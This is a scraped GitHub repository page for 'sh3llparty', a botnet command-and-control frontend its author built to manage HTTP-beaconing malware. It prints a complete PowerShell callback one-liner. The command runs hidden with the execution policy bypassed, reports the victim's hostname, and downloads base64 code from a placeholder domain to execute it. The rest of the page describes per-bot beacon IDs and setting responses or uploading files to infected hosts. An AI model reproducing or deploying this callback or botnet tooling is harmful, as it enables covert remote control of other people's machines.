wumb0 / sh3llparty

botnet frontend i wrote in a night and then improved over a few other nights

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

sh3ll party

I had malware that called back at specified intervals via http but no frontend to manage it. This is what I came up with.

Callback script: powershell -w hidden -ep bypass -nop -c "$i=(New-Object Net.WebClient);$i.Headers.add('hostid',[net.dns]::GetHostByName('').HostName);IEX([Text.Encoding]::Ascii.GetString([Convert]::FromBase64String($i.DownloadString('http://your.domain.here'))))"

You have to have a unique beacon id for each beacon. It can be anything. Make it the hostname, ip, mac, whatever. Set response manually or upload a file. JQuery based datatables make it pretty. A bunch of shitty javascript makes it functional.

About

botnet frontend i wrote in a night and then improved over a few other nights


Languages

Language:HTML 42.9%Language:C++ 27.7%Language:Python 22.7%Language:PowerShell 6.7%